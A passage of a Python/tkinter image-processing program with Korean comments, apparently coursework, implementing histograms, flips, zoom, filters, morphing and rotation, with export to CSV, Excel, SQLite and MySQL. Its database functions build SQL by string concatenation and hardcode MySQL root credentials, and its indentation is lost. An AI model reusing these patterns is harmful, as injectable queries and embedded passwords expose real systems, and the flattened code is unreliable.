# 정규화된값 = (카운트값 - 최소값) * High / (최대값 - 최소값)
maxVal = max (countList); minVal = min(countList)
for i in range(len(countList)) :
normalList[i] = (countList[i] - minVal) * 256 / (maxVal - minVal)
# 화면 출력
subWindow = Toplevel(window)
subWindow.geometry('256x256')
subCanvas = Canvas(subWindow, width=256, height=256)
subPaper = PhotoImage(width=256, height=256)
subCanvas.create_image((256/2,256/2), image=subPaper, state='normal')
for i in range(0, 256) :
for k in range(0, int(normalList[i])) :
data = 0
subPaper.put('#%02x%02x%02x' % (data, data, data), (i, 255-k))
subCanvas.pack(expand=1, anchor=CENTER)
subWindow.mainloop()
import matplotlib.pyplot as plt
def a_histogram2() : # 히스토 그램
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0] * 256
for i in range(outH) :
for k in range(outW) :
value = outImage[i][k]
countList[value] += 1
plt.plot(countList)
plt.show()
def upDown() : # 상하 반전 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[outW-1-i][k] = inImage[i][k]
display()
def LRReversalImage():# 좌우반전 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][outH - 1 - k] = inImage[i][k] #{핵심} #좌우 반전
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # 축소하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
def zoomInForW() : #화면확대-전방향
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('화면확대-전방향', '화면확대(전방향)할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW*scale); outH = int(inH*scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i * scale)][int(k * scale)] = inImage[i][k] # {핵심} 곱하기
display()
#결과 이상하게 나옴 {작업 중}
# def zoomInBackW(): #화면확대-역방향-이웃 화소 보간법
# global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# # 중요! 출력메모리의 크기를 결정
# scale = askinteger('화면확대-역방향', '화면확대(역방향)할 배수-->', minvalue=2, maxvalue=32)
# outW = int(inW*scale); outH = int(inH*scale);
# outImage = []; tmpList = []
# for i in range(outH): # 출력메모리 확보(0으로 초기화)
# tmpList = []
# for k in range(outW):
# tmpList.append(0)
# outImage.append(tmpList)
# #############################
# # 진짜 영상처리 알고리즘을 구현
# ############################
# for i in range(inH) :
# for k in range(inW) :
# outImage[int(i)][int(k)] = inImage[int(i/scale)][int(k/scale)] #{핵심}
# display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outW):
for k in range(outH):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
import csv
def saveCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outW):
for col in range(outH):
data = outImage[row][col]
row_list = [row, col, data]
csvWriter.writerow(row_list)
print('OK!')
def saveShuffleCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='wb',
defaultextension="*.csv", filetypes=(("csv파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
rowFileList = []
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outW):
for col in range(outW):
data = outImage[row][col]
row_list = [col, row, data] # 행,열->열,행으로 바뀌니깐
rowFileList.append(row_list) #
random.shuffle(rowFileList)
for row_list in rowFileList:
csvWriter.writerow(row_list)
def loadCSV(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = -1
fp = open(fname, 'r')
for f in fp :
fsize += 1
fp.close()
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'r') # 파일 열기(바이너리 모드)
csvFP = csv.reader(fp)
next(csvFP)
for row_list in csvFP :
row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
inImage[row][col] = value
fp.close()
def openCSV() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
loadCSV(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import sqlite3
def saveSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(inW) + \
"," + str(i) + "," + str(k) + "," + str(inImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok! saveSQLite')
def openSQLite() :# ['강아지:128', '강아지:512' ....]
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = []
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openSQLite")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openSQLite")
import pymysql
def saveMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.59.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
try:
sql = "DELETE FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + str(outW)
cur.execute(sql)
con.commit()
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) + \
"," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok! saveMySQL')
def openMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.59.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openMySQL")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openMySQL")
import xlwt
def saveExcel1() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xls", filetypes=(("XLS파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlwt.Workbook()
ws = wb.add_sheet(sheetName)
for rowNum in range(outH):
for colNum in range(outW):
data = outImage[rowNum][colNum]
ws.write(rowNum, colNum, data)
wb.save(output_file)
print('OK! saveExcel1')
import xlsxwriter
def saveExcel2() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xlsx", filetypes=(("XLSX파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlsxwriter.Workbook(output_file)
ws = wb.add_worksheet(sheetName)
ws.set_column(0, outW, 1.0) # 약 0.34 쯤
for r in range(outH):
ws.set_row(r, 9.5) # 약 0.35 쯤
for rowNum in range(outW) :
for colNum in range(outH) :
data = outImage[rowNum][colNum]
# data 값으로 셀의 배경색을 조절 #000000~#FFFFFF
if data > 15 :
hexStr = '#' + (hex(data)[2:])*3
else :
hexStr = '#' + ('0' + hex(data)[2:]) * 3
# 셀의 포맷을 준비
cell_format = wb.add_format()
cell_format.set_bg_color(hexStr)
ws.write(rowNum, colNum, '', cell_format)
wb.close()
print('OK! saveExcel2')
def a_histoStretch() : # 히스토그램 스트래칭 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
maxVal, minVal, HIGH = 0, 255, 255
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal :
maxVal = data
if data < minVal :
minVal = data
# 히스토그램 스트래칭
# OUT = (IN - 최소값) * HIGH / (최대값 - 최소값)
for i in range(inH) :
for k in range(inW) :
value = int( (inImage[i][k] - minVal) * HIGH / ( maxVal - minVal) )
if value < 0 :
value = 0
elif value > 255 :
value = 255
outImage[i][k] = value
display()
def a_endInSearch() : # 엔드-인 탐색 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
maxVal, minVal, HIGH = 0, 255, 255
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal :
maxVal = data
if data < minVal :
minVal = data
limit = askinteger('엔드인', '상하 범위:', minvalue=1, maxvalue=127)
maxVal -= limit
minVal += limit
# 히스토그램 스트래칭
# OUT = (IN - 최소값) * HIGH / (최대값 - 최소값)
for i in range(inH) :
for k in range(inW) :
value = int( (inImage[i][k] - minVal) * HIGH / ( maxVal - minVal) )
if value < 0 :
value = 0
elif value > 255 :
value = 255
outImage[i][k] = value
display()
def a_histoEqual() : # 히스토그램 평활화 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
histo = [0] * 255; sumHisto = [0] * 255; normalHisto=[0] * 255
HIGH = 255
# 히스토그램 작성
for i in range(inH) :
for k in range(inW) :
value = inImage[i][k]
histo[value] += 1
# 누적 히스토그램 작성
sVal = 0
for i in range(len(histo)) :
sVal += histo[i]
sumHisto[i] = sVal
# 정규화된 누적 히스토그램 : (누적합 / (행개수*열개수)) * HIGH
for i in range(len(sumHisto)) :
normalHisto[i] = int(sumHisto[i] / (outW * outH) * HIGH)
# 정규화된 값으로 출력하기
for i in range(inH) :
for k in range(inW) :
index = inImage[i][k]
outImage[i][k] = normalHisto[index]
display()
def embossing() : # 화소영역 - 엠보싱 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
MSIZE=3
mask = [ [-1, 0, 0], [0, 0, 0], [0, 0, 1] ]
# 임시 입력 영상 = inImage보다 2열이 큰...
tmpInImage = []
for i in range(inH + 2):
tmpList = []
for k in range(inW + 2):
tmpList.append(128)
tmpInImage.append(tmpList)
tmpOutImage = []
for i in range(outH):
tmpList = []
for k in range(outW):
tmpList.append(0)
tmpOutImage.append(tmpList)
# 원래입력 --> 임시입력
for i in range(inH):
for k in range(inW):
tmpInImage[i+1][k+1] = inImage[i][k]
# 회선연산하기. 마스크로 쭉 긁으면서 계산하기...
for i in range(1, inH):
for k in range(1, inW):
# 1점을 처리하되, 3x3 반복해서 처리: 마스크 연산 : 모두 곱해서더하기
S = 0.0
for m in range(0,MSIZE) :
for n in range(0,MSIZE) :
S += mask[m][n]*tmpInImage[i+(m-1)][k+(n-1)]
tmpOutImage[i-1][k-1] = S
# 127 더해주기 (마스크의 합계가 0인 경우)
for i in range(outW):
for k in range(outH):
tmpOutImage[i][k] += 127
# 임시 출력 --> 원래출력
for i in range(outW) :
for k in range(outH) :
value = int(tmpOutImage[i][k])
if value > 255 :
value = 255
elif value < 0 :
value = 0
outImage[i][k] = value
display()
def morphing() : # 모핑 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
# 영상 파일 선택
filename2 = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
if filename2 == '' or filename2 == None :
return
inImage2 =[]
fsize2 = os.path.getsize(filename2)
inH2 = inW2 = int(math.sqrt(fsize2))
if inH2 != inH :
return
fp2 = open(filename2, 'rb')
for i in range(inH2): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW2):
data = int (ord(fp2.read(1)))
tmpList.append(data)
inImage2.append(tmpList)
fp2.close()
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
value = askinteger('합성비율', '두번째 영상의 가중치%-->', minvalue=1, maxvalue=99)
w1 = 1- (value/100); w2 = 1-w1
for i in range(inH) :
for k in range(inW) :
data = int(inImage[i][k]*w1 + inImage2[i][k]*w2)
if data > 255 :
data = 255
elif data < 0 :
data = 0
outImage[i][k] = data
display()
def blurr() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW;
outH = inH;
outImage = [];
tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
mSize = 3
mask = [[1/9, 1/9, 1/9], [1/9, 1/9, 1/9], [1/9, 1/9, 1/9]]
#####################
# 임시 입력 영상 + 2
tmpInImage = []
for i in range(0, inW + 2):
tmpList = []
for k in range(0, inH + 2):
tmpList.append(127)
tmpInImage.append(tmpList)
# 임시 출력 영상
tmpOutImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
tmpOutImage.append(tmpList)
# 입력 ==> 임시 입력
for i in range(0, inW):
for k in range(0, inH):
tmpInImage[i + 1][k + 1] = inImage[i][k]
# 회선 연산.
for i in range(1, inW):
for k in range(1, inH):
# 1점에 대해서 3x3마스크 연산 --> 모두 곱해서 더하기.
s = 0.0
for m in range(0, mSize):
for n in range(0, mSize):
s += mask[m][n] * tmpInImage[i + m][k + n]
tmpOutImage[i - 1][k - 1] = s
# 결과값 처리 (0<, 255>, mask합계가 0이면 어두워)
# for i in range(0, outW):
# for k in range(0, outH):
# tmpOutImage[i][k] += 127.0
# 임시 출력 --> 출력
for i in range(0, outW):
for k in range(0, outH):
if tmpOutImage[i][k] < 0:
outImage[i][k] = 0
elif tmpOutImage[i][k] > 255:
outImage[i][k] = 255
else:
outImage[i][k] = int(tmpOutImage[i][k])
display()
def sharp() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW;
outH = inH;
outImage = [];
tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
mSize = 3
# mask = [[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]] #마스크1
mask = [[0, -1, 0], [-1, 5, -1], [0, -1, 0]] #마스크2
#####################
# 임시 입력 영상 + 2
tmpInImage = []
for i in range(0, inW + 2):
tmpList = []
for k in range(0, inH + 2):
tmpList.append(127)
tmpInImage.append(tmpList)
# 임시 출력 영상
tmpOutImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
tmpOutImage.append(tmpList)
# 입력 ==> 임시 입력
for i in range(0, inW):
for k in range(0, inH):
tmpInImage[i + 1][k + 1] = inImage[i][k]
# 회선 연산.
for i in range(1, inW):
for k in range(1, inH):
# 1점에 대해서 3x3마스크 연산 --> 모두 곱해서 더하기.
s = 0.0
for m in range(0, mSize):
for n in range(0, mSize):
s += mask[m][n] * tmpInImage[i + m][k + n]
tmpOutImage[i - 1][k - 1] = s
# 결과값 처리 (0<, 255>, mask합계가 0이면 어두워)
# for i in range(0, outW):
# for k in range(0, outH):
# tmpOutImage[i][k] += 127.0
# 임시 출력 --> 출력
for i in range(0, outW):
for k in range(0, outH):
if tmpOutImage[i][k] < 0:
outImage[i][k] = 0
elif tmpOutImage[i][k] > 255:
outImage[i][k] = 255
else:
outImage[i][k] = int(tmpOutImage[i][k])
display()
def edge1() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW;
outH = inH;
outImage = [];
tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
mSize = 3
mask = [[-1/9, -1/9, -1/9], [-1/9, 8/9, -1/9], [-1/9, -1/9, -1/9]]
#####################
# 임시 입력 영상 + 2
tmpInImage = []
for i in range(0, inW + 2):
tmpList = []
for k in range(0, inH + 2):
tmpList.append(127)
tmpInImage.append(tmpList)
# 임시 출력 영상
tmpOutImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
tmpOutImage.append(tmpList)
# 입력 ==> 임시 입력
for i in range(0, inW):
for k in range(0, inH):
tmpInImage[i + 1][k + 1] = inImage[i][k]
# 회선 연산.
for i in range(1, inW):
for k in range(1, inH):
# 1점에 대해서 3x3마스크 연산 --> 모두 곱해서 더하기.
s = 0.0
for m in range(0, mSize):
for n in range(0, mSize):
s += mask[m][n] * tmpInImage[i + m][k + n]
tmpOutImage[i - 1][k - 1] = s
# 결과값 처리 (0<, 255>, mask합계가 0이면 어두워)
# for i in range(0, outW):
# for k in range(0, outH):
# tmpOutImage[i][k] += 127.0
# 임시 출력 --> 출력
for i in range(0, outW):
for k in range(0, outH):
if tmpOutImage[i][k] < 0:
outImage[i][k] = 0
elif tmpOutImage[i][k] > 255:
outImage[i][k] = 255
else:
outImage[i][k] = int(tmpOutImage[i][k])
display()
def edge2() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW;
outH = inH;
outImage = [];
tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
mSize = 3
mask = [[0, 0, 0], [-1, 1, 0], [0, 0, 0]]
#####################
# 임시 입력 영상 + 2
tmpInImage = []
for i in range(0, inW + 2):
tmpList = []
for k in range(0, inH + 2):
tmpList.append(127)
tmpInImage.append(tmpList)
# 임시 출력 영상
tmpOutImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
tmpOutImage.append(tmpList)
# 입력 ==> 임시 입력
for i in range(0, inW):
for k in range(0, inH):
tmpInImage[i + 1][k + 1] = inImage[i][k]
# 회선 연산.
for i in range(1, inW):
for k in range(1, inH):
# 1점에 대해서 3x3마스크 연산 --> 모두 곱해서 더하기.
s = 0.0
for m in range(0, mSize):
for n in range(0, mSize):
s += mask[m][n] * tmpInImage[i + m][k + n]
tmpOutImage[i - 1][k - 1] = s
# 결과값 처리 (0<, 255>, mask합계가 0이면 어두워)
# for i in range(0, outW):
# for k in range(0, outH):
# tmpOutImage[i][k] += 127.0
# 임시 출력 --> 출력
for i in range(0, outW):
for k in range(0, outH):
if tmpOutImage[i][k] < 0:
outImage[i][k] = 0
elif tmpOutImage[i][k] > 255:
outImage[i][k] = 255
else:
outImage[i][k] = int(tmpOutImage[i][k])
display()
def edge3() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW;
outH = inH;
outImage = [];
tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
mSize = 3
mask = [[0, -1, 0], [0, 1, 0], [0, 0, 0]]
#####################
# 임시 입력 영상 + 2
tmpInImage = []
for i in range(0, inW + 2):
tmpList = []
for k in range(0, inH + 2):
tmpList.append(127)
tmpInImage.append(tmpList)
# 임시 출력 영상
tmpOutImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
tmpOutImage.append(tmpList)
# 입력 ==> 임시 입력
for i in range(0, inW):
for k in range(0, inH):
tmpInImage[i + 1][k + 1] = inImage[i][k]
# 회선 연산.
for i in range(1, inW):
for k in range(1, inH):
# 1점에 대해서 3x3마스크 연산 --> 모두 곱해서 더하기.
s = 0.0
for m in range(0, mSize):
for n in range(0, mSize):
s += mask[m][n] * tmpInImage[i + m][k + n]
tmpOutImage[i - 1][k - 1] = s
# 결과값 처리 (0<, 255>, mask합계가 0이면 어두워)
# for i in range(0, outW):
# for k in range(0, outH):
# tmpOutImage[i][k] += 127.0
# 임시 출력 --> 출력
for i in range(0, outW):
for k in range(0, outH):
if tmpOutImage[i][k] < 0:
outImage[i][k] = 0
elif tmpOutImage[i][k] > 255:
outImage[i][k] = 255
else:
outImage[i][k] = int(tmpOutImage[i][k])
display()
def rotate1(): #영상회전(포워딩)
global inImage, outImage, inH, inW, outH, outW, window, canvas, paper, filename
degree = askinteger('각도', '값 입력', minvalue=0, maxvalue=360)
# 출력 파일의 크기 결정.
outW = inW;
outH = inH
# 출력 영상 메모리 확보
outImage = []
for i in range(0, inW):
tmpList = []
for k in range(0, inH):
tmpList.append(0)
outImage.append(tmpList)
### 진짜 영상 처리 알고리즘 ###
radian = degree * 3.141592 / 180.0
for i in range(0, inW):
for k in range(0, inH):
xs = i;
ys = k
xd = int(math.cos(radian) * xs - math.sin(radian) * ys)
yd = int(math.sin(radian) * xs + math.cos(radian) * ys)
if 0 <= xd < outW and 0 <= yd < outH:
outImage[xd][yd] = inImage[xs][ys]
###############################
display()
def rotate2(): #영상회전(백워딩 및 중앙)
global inImage, outImage, inH, inW, outH, outW, window, canvas, paper, filename
degree = askinteger('각도', '값 입력', minvalue=0, maxvalue=360)
# 출력 파일의 크기 결정.
outW = inW;
outH = inH
# 출력 영상 메모리 확보
outImage = []
for i in range(0, inW):
tmpList = []
for k in range(0, inH):
tmpList.append(0)
outImage.append(tmpList)
### 진짜 영상 처리 알고리즘 ###
radian = degree * 3.141592 / 180.0
cx = int(inW / 2);
cy = int(inH / 2)
for i in range(0, outW):
for k in range(0, outH):
xs = i;
ys = k
xd = int(math.cos(radian) * (xs - cx)
- math.sin(radian) * (ys - cy)) + cx
yd = int(math.sin(radian) * (xs - cx)
+ math.cos(radian) * (ys - cy)) + cy
if 0 <= xd < outW and 0 <= yd < outH:
outImage[xs][ys] = inImage[xd][yd]
else:
outImage[xs][ys] = 255
###############################
display()
def rotate3(): #영상회전(확대)
global inImage, outImage, inH, inW, outH, outW, window, canvas, paper, filename
degree = askinteger('각도', '값 입력', minvalue=0, maxvalue=360)
# 출력 파일의 크기 결정.
radian90 = (90 - degree) * 3.141592 / 180.0
radian = degree * 3.141592 / 180.0
outW = int(inH * math.cos(radian90) + inW * math.cos(radian))
outH = int(inH * math.cos(radian) + inW * math.cos(radian90))
# outW = inW; outH = inH
# 출력 영상 메모리 확보
outImage = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(0)
outImage.append(tmpList)
### 진짜 영상 처리 알고리즘 ###
# inImage2 크기를 outImage와 동일하게
inImage2 = []
for i in range(0, outW):
tmpList = []
for k in range(0, outH):
tmpList.append(255)
inImage2.append(tmpList)
# inImage --> inImage2의 중앙으로
gap = int((outW - inW) / 2)
for i in range(0, inW):
for k in range(0, inH):
inImage2[i + gap][k + gap] = inImage[i][k]
### 진짜 영상 처리 알고리즘 ###
cx = int(outW / 2);
cy = int(outH / 2)
